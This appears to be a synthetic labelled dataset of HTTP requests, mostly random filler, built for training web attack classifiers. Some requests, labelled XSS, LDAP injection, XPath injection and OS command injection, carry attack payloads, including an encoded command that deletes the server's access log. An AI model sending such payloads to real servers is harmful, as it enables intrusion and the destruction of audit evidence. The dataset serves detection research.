GET /ANqWFJPLiZ2/vwjl/eVI@7dAZ1/EoDoe7mzdtafbe/reZalF/hPwb2IFwEuG4wJcSWPv/1lvg/o0rGC7Vc/hFGzBZ2fhMZl3Md_plV/n4KmabSGaAY4EPpvL6Y.tiff?eeDtcet6=tqQ&Ho8rsnatonetsi=%249e&ecaweaksrs=lnexa2rsEel&wxqVoZD=635&ev=%250arm++-f+++%2Fvar%2Flog%2Fhttpd%2Faccess_log+++++%3B HTTP/1.1
Host: 196.254.184.24
Connection: goneIxe
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: s7e9c-6ie;q=0.3
Cache-Control: only-if-cached
Client-ip: 164.53.226.238
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Wed, 18 Aug 04 24:26:21 UTC
ETag: "jIrF8GB@jiqHJsgpERvI"
Expect: 100-continue
From: eM8p@ehnasbf.it
If-Modified-Since: Sun, 13 Jun 04 09:04:32 GMT
If-Unmodified-Since: Tue, 08 Jan 08 21:33:18 GMT
If-Match: *
If-None-Match: "_@yRQJp3P-8C4N73cHhN"
If-Range: Thu, 04 Mar 04 09:23:13 GMT
Max-Forwards: 651
MIME-Version: 5.1
Pragma: nronts5=bvrhsdH
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Digest qop=auth
Range: -99
Referer: /tzbt/reatst/mear/dionrf/zqeotlne.pdf
TE: trailers,trailers
Trailer: Expect
User-Agent: ku3paq (ujGRFICsk)
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 319x516
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 193.68.229.100
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43415
Start - Id: 6327
class: Valid
POST /t6sKoU73XhdL28C/izXt2kI5cuf9qfHqpgsj/VimgdbBoJ_hFJL/rKdYqV7.JkweSZn/dZYwa5si1-L@5cJ.jpeg? HTTP/1.1
Content-Length: 45
Content-Language: tyueeXi,ranlc,an
Content-Encoding: gzip
Content-Location: /6qcGv1/h8Aahw/oe0on/PxghsgS9.php3
Content-MD5: Y25PaGNpdUxGbGRzc3Nhbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Nov 09 09:19:26 CET
Last-Modified: Thu, 18 Dec 08 12:08:09 CET
Host: www.72ye.it
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesesimp;q=0.6, x-mac-greek, iso-2022-jp;q=0.4
Accept-Encoding: 
Accept-Language: 1el-eceinreo;q=0.7, Jitppc-qsds, mO4a-ord36;q=0.4, R-ovtmo;q=0.9
Cache-Control: no-transform
Client-ip: 245.206.157.49
Cookie: oaeq0anncik=er9kuiiabzlti;opl4dttmos=lsv a/nOcidlno'n;tetiom2=640880
Cookie2: $Version="92"
Date: Thu, 11 Mar 10 02:56:17 UTC
ETag: "tV@OEWu5j_c9ci2"
Expect: tol9=eeiCtCi
From: ai8tEt@dHaaiz4iys.net
If-Modified-Since: Mon, 08 Nov 04 19:23:55 GMT
If-Unmodified-Since: Mon, 26 May 08 16:22:31 GMT
If-Match: "6gXOZA4ZIEmUXbU"
If-None-Match: *
If-Range: *
Max-Forwards: 339
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bWN6YTNlbmV0TnJldG5pb2VudWVzdW42amU1cnJwZnNwZWxuNWZseXRzY2Fs
Authorization: seidt lh0me=innipph
Range: 137601-
Referer: http://www.bb5ros.it/ieya3y/coZ6ph/Uesok.pdf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: osiRanetxn/0.9
UA-CPU: PowerPC
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9611x0201
Via: 4.2 www.O8627i.css, eua4su/4.7 166.198.80.199, FTP/7.1 206.48.48.5
Transfer-Encoding: deflate
Upgrade: mnlEe/6.9, ss49D/6.8
Warning: 474 www.tiORongx.jpeg "melgsetl" "Sat, 11 Mar 06 08:19:45 CET"
X-Forwarded-For: 150.186.242.245
X-Serial-Number: 9387717978
----: ------------------------------
~~~~~: ~~~~~~~~~~~~

dtdaroeokhu=iltxtEi&7mo77dsrio=PcpexmlioptnrN

End - Id: 6327
Start - Id: 15654
class: Valid
GET /.gENpWTUiC84WYC/ltrtnnIxfph.jsp?documentEQdivsjPQ=z5in4ap3casnauisee&AslrsH=ofsmeaaie HTTP/1.0
Host: www.k2itqaSr.org
Connection: close
Accept: text/*, video/quicktime, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=504
Client-ip: 9.72.225.172
Cookie: ngair5hrne3=l0Sws;D2zMcopydI88yA=ktenh8a;aeoep=6;WncrI=6DS.
Cookie2: $Version="6"
Date: Fri, 12 Mar 04 07:28:08 GMT
ETag: W/"xVr7snWk-xxAFMzN0Ea"
Expect: os6bi=AtHottq;ytotu
From: enyentta@0oaremMh1h.cz
If-Modified-Since: Tue, 25 Jan 05 05:35:58 UTC
If-Unmodified-Since: Thu, 26 Apr 07 20:27:59 CET
If-Match: *
If-None-Match: *
If-Range: "2M3fVzfqokGYo_-"
Max-Forwards: 7430
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: reai onoshDhe=eba1
Authorization: Digest opaque="inpo"
Range: 4066-0881,3-
Referer: /krttoiis.pdf
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.0 (X11; U; Open BSD i586 0.9; bd-Cs; rv:3.5.1) Gecko/68184871
UA-CPU: PowerPC
UA-Disp: 043,7183,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 2296x8201
Via: 3.0 31.95.87.189
Transfer-Encoding: deflate
Upgrade: 6tin9m/2.5
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 5797631898
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15654
Start - Id: 31928
class: Valid
GET /Tteoiuye7ymyt3.gif? HTTP/1.1
Host: www.xThehrmls.st:4
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: deflate
Accept-Language: Ae-hopnrs, o7eoT-6yr, 2oa-stvde;q=0.6
Cache-Control: min-fresh=228
Client-ip: 32.29.254.153
Cookie: Fxp_jKFjeiR=39;-4KDpuP=ko;f7sepwctr=bf~:e(gltt
Cookie2: $Version="73"
Date: Thu, 16 Feb 06 07:39:33 GMT
ETag: "0tYLiAHwktusfCi2j-TO"
Expect: 100-continue
From: to1tnnt@haeslhaccn.uk
If-Modified-Since: Sun, 14 Jan 07 09:39:13 GMT
If-Unmodified-Since: Sat, 20 Oct 07 04:50:53 UTC
If-Match: "muXwmtOT_il34iz"
If-None-Match: *
If-Range: "ktTuopfAlvDjLnFkF1"
Max-Forwards: 235
MIME-Version: 6.1
Pragma: o='bw'
Proxy-Authorization: NTLM aFJuSHM5c2hpdGlvSGwwSGZ3dE5hbnBkd2l1b1VwaWR0dnM3YXVyd2FvYW1vdGVu
Authorization: Basic dGFubzplcmVl
Range: -8,3314-2228
Referer: /risxndsi/rtn4q/6emuoru.ace
TE: trailers,deflate;q=0.4
Trailer: Expect
User-Agent: Mozilla/5.7 (compatible; tetco; WinNT; runinr; ogrStwehl)
UA-CPU: 68000
UA-Disp: 0617,6315,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 049x223
Via: 6gaake/8.5 87.107.153.196:9462, HTTP/7.9 www.7enTrbeL.shtml
Transfer-Encoding: deflate
Upgrade: nKety0/5.6, wZTeeb/7.6
Warning: 131 www.apir.html "lnAgieyr2dmtfnwy" 
X-Forwarded-For: 159.180.214.45
X-Serial-Number: 643504609
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31928
Start - Id: 8730
class: Valid
GET /sghe3sOsN3rvyiD/fihBRJAhb0OczWYzF6U/nxeagsorcr/5rsArhuje3/5eEiealOlfsAe/y88cp/badmd.mspx? HTTP/1.0
Host: www.ordahP.uk
Connection: close
Accept: text/plain
Accept-Charset: cp-950;q=0.7, x-mac-hebrew;q=0.0, iso-8859-3;q=0.9, hz-gb-2312, koi8
Accept-Encoding: identity, compress;q=0.4, compress;q=0.9, deflate;q=0.6, gzip;q=0.9
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 27.50.5.120
Cookie: 8rie3low=hpqi8kGfeVtcanTnTa;reatr=[ r;Yirsauahh7rbNm=7109149588
Cookie2: $Version="57"
Date: Mon, 31 Jan 05 09:48:38 CET
ETag: W/"yN48kMoIMTdNdg3vEW"
Expect: 100-continue
From: mteeb@o92wOhll.cz
If-Modified-Since: Wed, 14 Jan 04 05:59:56 CET
If-Unmodified-Since: Sun, 07 Jan 07 17:25:42 UTC
If-Match: "-D9eLnBkFUJJ19c5@2"
If-None-Match: *
If-Range: Sat, 01 Jul 06 11:43:08 CET
Max-Forwards: 3
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM dDFlb2lFa2lycG5vbnNhckN0T3lzd2VpMXJWZ2hFeWN3dHRlYTBkc1ZlZEhvZXQ=
Authorization: 5earle aygei=a5rGt
Range: -76,90082-8624,-748
Referer: http://t26ial.ch/iwimhot/cer3/ctrsSct/bzDyc/yroaen.swf
TE: deflate
Trailer: If-Match
User-Agent: aolawctiA/5.8.6.2
UA-CPU: PowerPC
UA-Disp: 0762,192,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 559x025
Via: FTP/4.8 84.241.22.91
Transfer-Encoding: ifnr
Upgrade: nr2n/6.6, c8dm/9.0, eih/0.8, mee/9.2
Warning: 196 69.31.102.112 "meOretmuAnoa24aNg" "Sun, 13 Nov 05 21:30:28 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 14852095010495286519
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8730
Start - Id: 48284
class: XSS
POST /G9GJ/eD1/hHKh1pDvtXx2/p-7BORcf7/eRHKRJBe/jvWstwhH.b@egRtdcU/tN-pNnWMfGY..neu6/nVncsCEYP/lCD/n@IuVqQ6XI1@-/ebwxpointwqtsniEf6.jpeg? HTTP/1.1
Content-Length: 25
Content-Language: o,ciS,dfse
Content-Encoding: gzip
Content-Location: http://www.sniuRae.gov/lemq5tp.gif
Content-MD5: eXR5N3RsdGdzc3ZlbGF0MQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Mar 10 22:14:55 UTC
Host: www.insrh.ch
Connection: keep-alive
Accept: image/jpeg, application/postscript;q=0.4
Accept-Charset: iso-2022-jp;q=0.6, us-ascii;q=0.7, iso-2022-kr;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: ma-i
Cache-Control: no-transform
Client-ip: 57.43.224.250
Cookie: Tdlepb=<bgsound     src=   " javascript:[alert   ('35tD');]  ">;qcs=3919411;ni=iee lrahw0kes48ns[lr
Cookie2: $Version="835"
Date: Fri, 20 Apr 07 21:11:40 CET
ETag: "NetEC123WaRpbFC"
Expect: hvrc
If-Modified-Since: Mon, 15 Sep 08 19:25:13 UTC
If-Unmodified-Since: Tue, 23 Jan 07 03:03:05 UTC
If-Match: "xsLl28bB-G1vw7fZ"
If-None-Match: "82@7vHckmTc37EskIkX"
If-Range: "wMIQJgM7OCNp-9hQw"
Max-Forwards: 612
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM ZFRhaXJlbzVlZHVldG5sZmxlbXVhaTgzMXV0cmhjbnNhM3Q=
Authorization: Basic U3NhbTpqbm9t
Range: 356-3
Referer: http://emlm.com/iddxdr/yae1/opwmeee/boeoep/o08ct.mdb
TE: deflate,deflate;q=0.8,trailers
User-Agent: lhtas52kinea4Ge
UA-OS: Windows 98
Transfer-Encoding: compress
Upgrade: a8iead/9.4
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fDdY2sB.h=Df8iehs5oaobRtE

End - Id: 48284
Start - Id: 38882
class: LdapInjection
GET /cSs/lRje1/abPy50oBgMf8pxzU/rtms7dgoi/rNmJq1lKxDp6AkxZWn7/exd6udeieeprepe/fnldltrnorgeqIQ/d7Y-8MxN.5/eiszK2cBiKv9Luk2Ck3/baErkOYtDMDb/roaaeljemsengg/iMyPJtQ6-FI9dVyRUY.jpg?HkWnetcat8y=%29%28++++%7C++++%28+cn%3D*o++%27brien*++%29%28mail%3D*o+%27brien*++++%29&a0=9209&eobfn8ktx=a6wtldouhdd8&XGsgroup byNm@Qa=ii7tamtesdfsnd&itnmheerd=17&roblortau=3286687&Ydxp_t=044&ewyse=cs&lekMurklgu=hll8prlaehmmbksho HTTP/1.1
Host: www.mucm0tacei.com
Connection: hhpe
Accept: image/png, video/*;q=0.3, text/plain;q=0.1
Accept-Charset: hz-gb-2312;q=0.2, x-mac-arabic, iso-8859-8-i;q=0.3, x-mac-ce;q=0.9
Accept-Encoding: gzip;q=0.3, compress
Accept-Language: caWwgd-tiplTtt;q=0.2, i5Acr-u;q=0.8
Cache-Control: no-transform
Client-ip: 185.212.239.81
Cookie: hluNit=sYl;CexecKQbcatZI=5ecemrl;ossb=22;RVGZG7=i8rEnr\;fu8USckbRAR=re(;V_PQ=535818655
Cookie2: $Version="1"
Date: Wed, 01 Nov 06 23:59:51 UTC
ETag: W/"sTJpGFOPAFy.lHNa"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sun, 13 May 07 11:55:06 UTC
If-Unmodified-Since: Tue, 21 Apr 09 17:39:38 CET
If-Match: "me2C6EiJeYW.QQY.Rk3a"
If-None-Match: "FuCI2H@NvxICIuKc.e"
If-Range: Fri, 25 Jul 08 24:18:09 CET
Max-Forwards: 32
MIME-Version: 1.6
Pragma: avqey=srneu
Proxy-Authorization: Basic dGFkZmhzOnR2anRr
Authorization: Digest username="ep7anefI"
Range: 15934-,799-8058,-81465
Referer: http://www.aq6n5n.st/neAao3as/sssAAe.jsp
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: 5ttutae/2.5.1
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 279x383
Via: nsXtoo/3.1 218.43.21.86:053
Transfer-Encoding: gzip
Upgrade: p9rld/0.9, tneW2/8.4
Warning: 654 173.160.4.85 "Ioao" 
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38882
Start - Id: 13009
class: Valid
GET /NieErnpppNepy5/swd/yQNjTr8qi0jw.png?5Ue=4059&indhwamttk=yTecd9nranpi3&.Yee=seamdrbXP&t1lEeric=oeauroftybteswi&mT6Oc=mnqR.zrda8x6&de5fhLHn8cGhe=4401949&6ctwatm1rRooee7=msnoee&thpr5QolioHo=7smcscmeeeAtwlesf HTTP/1.0
Host: 33.156.41.95
Connection: keep-alive
Accept: image/*, application/*, text/*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.7
Accept-Language: *;q=0.2
Cache-Control: min-fresh=984
Client-ip: 82.22.221.79
Cookie: Tabpdst8gRoet=97192737;vafaE=zodenhaoOdrmt;agnic3rews=0042;-Ehhz_R=50
Cookie2: $Version="656"
Date: Sun, 07 Oct 07 12:51:56 GMT
ETag: W/"C1NvHTahwTsEvjKp0tBb"
Expect: Xeaushv
From: lusn@oOluioot.it
If-Modified-Since: Wed, 14 Dec 05 02:24:04 CET
If-Unmodified-Since: Sun, 30 Sep 07 19:37:06 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Nov 07 10:06:10 GMT
Max-Forwards: 7
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: neu4oo ehnere3=sninoseh
Authorization: Basic c285c3Q1b2g6bW9INzBsamw=
Range: 777-8861,-671902,43-427
Referer: /71rwth/Erabqf/7cec/dsseebot/1tneref.sh
TE: trailers,trailers,chunked
Trailer: Range
User-Agent: jWboed/1.4.3
UA-CPU: StrongARM
UA-Disp: 222,458,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 011x9947
Via: iies/4.7 www.4a8es.shtml, 9.8 www.r1me.jpg
Transfer-Encoding: gzip
Upgrade: 4aci/6.7
Warning: 278 www.2Nmfe.png "0irSv" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 48761623
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13009
Start - Id: 23803
class: Valid
GET /qmR8Ypassthru6/oiir/ukFFBG9PkVr/di/oP/HtgkrJhGTh/oGX7rFtUC/ufen4j4reutDsy9gXE/njPGDuluxJZLQ-/nasuA.cgi? HTTP/1.1
Host: 69.142.116.119
Connection: keep-alive
Accept: application/x-tar, image/*;q=0.0
Accept-Charset: windows-1254;q=0.5
Accept-Encoding: gzip;q=0.0, deflate;q=0.7
Accept-Language: eTxa-tne, Tee4eu4-lrEtdUr, eqw-wcdkdmx;q=0.4
Cache-Control: max-stale=87
Client-ip: 18.204.47.206
Cookie: moiirhArhc=w6W5KX46ZAyG
Cookie2: $Version="4"
Date: Sun, 28 Mar 04 17:04:32 GMT
ETag: "jqSsuoDhZLg_Ldm0_k"
Expect: 100-continue
From: qxnsoq3@osGhOo8ae.gov
If-Modified-Since: Thu, 21 Aug 08 03:42:42 UTC
If-Unmodified-Since: Sat, 19 Nov 05 17:37:10 UTC
If-Match: "TJ_YcLO9eraM2K-u3"
If-None-Match: *
If-Range: Sun, 09 Jan 05 06:01:55 UTC
Max-Forwards: 5
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM ckRTdG5mZXJvVXNvc2VvZ0cydGV4TG95MXJ4cmYyb2Zib25jaWNrZWV5YXJpMA==
Authorization: NTLM dFN1cmE2dGVjdGVvb3BlOHJsbklvZWh0bm44b3BkaXk=
Range: 323-
Referer: http://araaq.it/qa6n.wav
TE: chunked;q=0.9
Trailer: From
User-Agent: eiVs/3.3.9.0
UA-CPU: PowerPC
UA-Disp: 363,234,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9800x454
Via: FTP/2.0 37.35.88.116
Transfer-Encoding: compress
Upgrade: rae/8.5, ne4/3.3, e4ck/8.2, 0teaus/2.2
Warning: 649 www.aAvheed.png "dS6Fnimdaari" 
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23803
Start - Id: 47962
class: XSS
GET /tdyCetgwGetr3yhae8/kxx/cS4N5j5boelOj_eH7vC/VNDfD-d9UO6Yxw/n27.iU/miwVgp/gTtF9cy_ruZjkgg2B/uSAgK-epg/baiddjdpil/nkDJ6_Rg71ABdrxvGN/syao0t6fkyns/nY3Di0S.js?i94iotEeUtai=1555&iEliowc=yi6eteecnxuu7rs&ot=22341&rtoeoalgo89Edm=%3Cxml+++src+%3D+%22++javascript%3A%5Balert++++%28%27let%27%29%3B%5D+%22+++%3E&aod=etN18&WMwkL=861818656&Ee=ilss&ydKC.=uic&ekes=e%7E1hxe0%29sis%3Dr&seameno=e4h&7dlqon1=794083&acot4bErwte=31&lientewp3dane=60 HTTP/1.0
Host: www.lao0Bsr.biz
Connection: gmserku
Accept: text/*
Accept-Charset: iso-8859-6, windows-1255;q=0.6, iso-8859-8-i;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=94
Client-ip: 208.53.71.232
Cookie: heeh=yv-
Cookie2: $Version="32"
Date: Sun, 14 Jun 09 17:13:44 UTC
ETag: W/"Mw_-1Tt9@rmm-RMax"
Expect: 100-continue
From: e4le@beZlsQbrdn.de
If-Modified-Since: Mon, 19 Apr 10 16:52:33 UTC
If-Unmodified-Since: Mon, 29 Nov 04 11:26:06 CET
If-Match: *
If-None-Match: "OiEfMBB6sHnf83S"
If-Range: *
Max-Forwards: 88
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth
Range: -162,92-
Referer: http://www.ehooixm.fr/sNre/rnlhtr/Z6wtytb5.msf
TE: trailers
Trailer: Expect
User-Agent: Mozilla/4.6 (X11; U; SunOS sun4u 7.5; er-3v; rv:4.3.1) Gecko/38253285
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3364x532
Via: 6.5 75.242.192.14
Transfer-Encoding: gzip
Upgrade: tco/6.7, yt2ien/0.1, jit/2.8, ect/0.5, ket1t/7.7
Warning: 258 www.enaLrqsn.shtml "owbjsDoG4e" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47962
Start - Id: 2932
class: Valid
GET /sh.dll?DBTcmdu=eele8x&en=zo40ombetl&14nn=56&iWFsbopennodehF=hd&pid=1&ocS=515&nnalftsottco=286907328&hfPzcaayQtoi=s&cy=jaoa3ol HTTP/1.1
Host: 200.23.49.184
Connection: hhe7
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=77
Client-ip: 169.145.144.163
Cookie: zll=o8eglas2SalbooTn;yttt9asOsbDhwe=1xnR4.7Km;2Ogy=713752;v3aHjyall=hhttpDn6sN;03MypBNJE=areplace
Cookie2: $Version="4"
Date: Tue, 31 May 05 02:57:57 GMT
ETag: "A-367QW-qbH4e9vzMAm"
Expect: 100-continue
From: qg1rhg@3iIi.de
If-Modified-Since: Thu, 29 Nov 07 24:09:22 GMT
If-Unmodified-Since: Fri, 27 Feb 09 23:54:34 UTC
If-Match: *
If-None-Match: "gpQPu9lYc8_ciZo6DNW"
If-Range: *
Max-Forwards: 6663
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rieTn
Authorization: eofnhI BrtAcekt=rtdsdyru
Range: 65-
Referer: /ienEal.php3
TE: chunked,deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: uBtImnn/5.5
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 202x8189
Via: HTTP/4.3 88.168.190.141
Transfer-Encoding: identity
Upgrade: aqeAe/2.5, uaisaa/2.3
Warning: 530 www.zisn.js "a3sxuae" "Sun, 09 Jul 06 13:08:32 GMT"
X-Forwarded-For: 228.20.165.235
X-Serial-Number: 677820
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2932
Start - Id: 21119
class: Valid
GET /c-pSIAHeW9io/euv.css? HTTP/1.0
Host: www.meNnuGHhW.uk
Connection: ioOnier
Accept: application/postscript
Accept-Charset: iso-10646-ucs-2, iso-8859-15;q=0.9, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 229.226.31.164
Cookie: weno1ieAr=l68mprocessing-instruction5tmpe
Cookie2: $Version="9"
Date: Wed, 28 Jan 09 14:57:21 GMT
ETag: "VR5Hc8RtYKkR9cBH"
Expect: betHis=Lihei7e
From: esr8neue@emIt.biz
If-Modified-Since: Wed, 12 May 04 05:17:01 CET
If-Unmodified-Since: Fri, 14 Apr 06 13:22:32 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Feb 05 02:12:20 CET
Max-Forwards: 6
MIME-Version: 2.7
Pragma: SyeIttl=sbne
Proxy-Authorization: Digest uri=http://bu9stei.be/jpini/churmrxe.pdf
Authorization: wlue poihH=xeCi3
Range: 08246-7
Referer: http://www.eboldD.gov/ejcm.jpg
TE: trailers,trailers,chunked;q=0.1
Trailer: Connection
User-Agent: Mozilla/9.3 (compatible; MSIE 4.3; WinNT; earE; Jylvyrtul)
UA-CPU: PowerPC
UA-Disp: 595,813,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 969x1839
Via: FTP/5.2 4.19.17.42:52629, HTTP/4.7 74.28.48.23:89443, fob/0.1 www.scou7o.html
Transfer-Encoding: gzip
Upgrade: nwr/6.8, eak/9.5, 9dej/0.9, urA/5.8, ecpeiw/5.4
Warning: 755 www.7ereiwoa.htm:827 "Aexaowm" "Sat, 08 Apr 06 11:48:05 GMT"
X-Forwarded-For: 3.73.105.34
X-Serial-Number: 0274722
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21119
Start - Id: 49317
class: XPathInjection
GET /tM.fu/itnnrnEeeyzp7ntnnc11/vnhqhxhe/8xeRIWX.gft/WCrhgT_6MvR2Fr/nus4lwherptc/qi8/7ZGkzP8R4VLmzf/@tIpvAAPLiframert@lib/6oawnndhaeoslEd.css?dT=eeoa%3B&osdnrp4ngo=rtwgetiUte%7EePn&agHxwquntoeennq=gadeT%27++++or++6++++%3C++++count%28path%2Fchild%3A%3A*%29++++or++%27sa%27%3D++++%27&fMedivawuacao=mfxXBnqNJ4V&8ad742tennorhfe=%3AEudjtdocument&doyaai7=xohye6s&Curaansa=wi3ratu HTTP/1.1
Host: www.dekoSkhvyg.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity, deflate;q=0.9
Accept-Language: *;q=0.6
Cache-Control: 5xkrlhu=2duanE
Client-ip: 66.86.201.155
Cookie: 9xteIw=846177751;ieafesz8ye=u3uhome7%iHtodocumentL[oj3ms;acezehu=ciAgw@
Cookie2: $Version="4"
Date: Wed, 13 Jul 05 19:39:12 UTC
ETag: "nQHcadU1EvgfeIQ"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 22 Jun 05 21:26:43 CET
If-Unmodified-Since: Sun, 02 Sep 07 14:03:04 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 07:28:24 UTC
Max-Forwards: 4
MIME-Version: 7.2
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: 6rts7i fsehur=hewya
Range: 28823-,87212-
Referer: http://www.tlc1F.fr/efNa/smqa5/snms.jpeg
TE: deflate;q=0.0,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.1 (compatible; Konqueror/1.2; Linux i386; 5t8n; hwdi)
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: FTP/9.2 www.twIk.shtml, 9nla/1.1 www.xarwg.jpg
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 970 91.193.19.21 "6desenmdo" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49317
Start - Id: 9985
class: Valid
GET /mGb8sSAZoWrefG/ptAH0x2_-/t4vtn/Irbierwh/ZNjps@AZ.processing-instructionYDY2/RRvreaedeazdfc.html? HTTP/1.1
Host: www.iaeegyeer.org
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: l-nrCm;q=0.8, cniha-oaaltzwa;q=0.5, facse-leito
Cache-Control: no-store
Client-ip: 41.19.16.178
Cookie: Sire2dia=fRKMJphegcA;7BQGdocumentO= 0scatzyshteu;fUrredeoe=ie|m;Z7158=e.O.ovjK;aooAaa=670231
Cookie2: $Version="143"
Date: Mon, 28 Jul 08 13:36:22 UTC
ETag: W/"Xm_AbeCBSRCOVhv_Iyj2"
Expect: 100-continue
From: knmx@Elha8dsti.biz
If-Modified-Since: Fri, 01 Sep 06 08:49:27 UTC
If-Unmodified-Since: Wed, 24 Feb 10 24:48:23 CET
If-Match: *
If-None-Match: "XIhqkhp18lo.6pbu"
If-Range: Tue, 26 May 09 09:19:57 CET
Max-Forwards: 7
MIME-Version: 2.8
Pragma: inmdosjo='lloooao'
Proxy-Authorization: adE2 tucxsisy=rg2o
Authorization: Basic czl5bjptcmU5eg==
Range: -96
Referer: /slna5/lmbesj/nmnd73s/pkaenxr6/szeot4gr.bin
TE: chunked;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/5.9 (Windows; U; Win98 2.5; ra-4r; rv:2.3.1) Gecko/08143872
UA-CPU: MIPS
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6267x971
Via: HTTP/3.6 www.lInankUy.jpg, eeidm/4.5 253.100.33.86, ihele5/8.9 www.es8tugiw.htm:189
Transfer-Encoding: o2f4o
Upgrade: b2bhql/3.8
Warning: 190 96.212.144.39 "6eoaBieotasga" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 7198158285326670
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9985
Start - Id: 42840
class: OsCommanding
